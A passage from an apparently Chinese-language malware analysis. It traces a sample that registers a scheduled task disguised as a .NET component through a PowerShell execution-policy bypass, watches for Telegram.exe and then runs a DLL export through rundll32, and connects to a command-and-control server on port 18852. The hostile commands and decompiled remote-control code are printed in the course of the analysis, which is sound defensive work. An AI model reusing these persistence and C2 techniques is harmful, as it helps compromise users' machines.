"o""n.vbs
然后释放文件updated.ps1内容如下，用于添加计划任务 复制代码 隐藏代码$xmlPath = "C:Users123AppDataLocalPolicyManagement.xml"$taskName = ".NET Framework NGEN v4.0.30325"$xmlContent = Get-Content -Path $xmlPath | Out-StringRegister-ScheduledTask -Xml $xmlContent -TaskName $taskName
然后调用shell32_ShellExecuteEx执行 复制代码 隐藏代码/C powershell -ExecutionPolicy Bypass -File C:\Users\123\AppData\Local\updated.ps1
2.2.5线程4：检测Telegram.exe

遍历寻找进程Telegram.exe 复制代码 隐藏代码char __cdecl sub_10013690(int a1){_DWORD v2[9]; // BYREF_BYTE v3[260]; // BYREFint v4; // char v5; // v5 = 0;v4 = ((int (__stdcall *)(int, _DWORD))kernel32_CreateToolhelp32Snapshot)(2, 0);if ( v4 == -1 )return 0;v2[0] = 296;if ( ((int (__stdcall *)(int, _DWORD *))kernel32_Process32First)(v4, v2) ){while ( !(unsigned __int8)((int (__cdecl *)(int, _BYTE *))unk_100145F0)(a1, v3) ){if ( !((int (__stdcall *)(int, _DWORD *))kernel32_Process32Next)(v4, v2) )goto LABEL_7;}v5 = 1;}LABEL_7:((void (__stdcall *)(int))kernel32_CloseHandle)(v4);return v5;}
如果寻找到这个进程就调用shell32_ShellExecuteEx打开rundll32.exe执行C:\Users\123\AppData\Roaming\\Axialis\\Update.dll,TCGamerUpdateMain。即调用这个导出函数执行config2.ini的内容
2.2.6config2.ini

内存加载config2.ini，然后将其dump下来，发现他pdb没有删除
发现这是未混淆过的版本，功能与上文一致


2.2.7执行远控

然后执行远控模块 复制代码 隐藏代码int sub_10013450(){_BYTE v1[400]; // BYREF_DWORD v2[8]; // BYREFvoid (*v3)(void); // _DWORD *v4; // BYREFint v5; // int v6; // int v7; // int v8; // int v9; // int v10; // _DWORD *i; // v4 = 0;i = 0;v10 = -1;((void (__stdcall *)(int, _BYTE *))ws2_32_WSAStartup)(514, v1);v2[0] = 0;memset(&v2[4], 0, 16);v2[1] = 2;v2[2] = 1;v2[3] = 6;while ( 1 ){v5 = ((int (__stdcall *)(char *, const char *, _DWORD *, _DWORD **))ws2_32_getaddrinfo)( a2712440155, "18852", v2, &v4);if ( !v5 ){for ( i = v4; i; i = (_DWORD *)i[7] ){v10 = ((int (__stdcall *)(_DWORD, _DWORD, _DWORD))ws2_32_socket)(i[1], i[2], i[3]);if ( v10 != -1 ){v5 = ((int (__stdcall *)(int, _DWORD, _DWORD))ws2_32_connect)(v10, i[6], i[4]);if ( v5 != -1 )break;((void (__stdcall *)(int))ws2_32_closesocket)(v10);v10 = -1;}}((void (__stdcall *)(_DWORD *))ws2_32_FreeAddrInfoW)(v4);if ( v10 != -1 )break;}((void (__stdcall *)(int))kernel32_Sleep)(3000);}v6 = 0;v8 = 4096;v7 = ((int (__cdecl *)(int))unk_1001DEDA)(4096);v9 = 0;while ( 1 ){v6 = ((int (__stdcall *)(int, int, int, _DWORD))ws2_32_recv)(v10, v9 + v7, v8 - v9, 0);if ( v6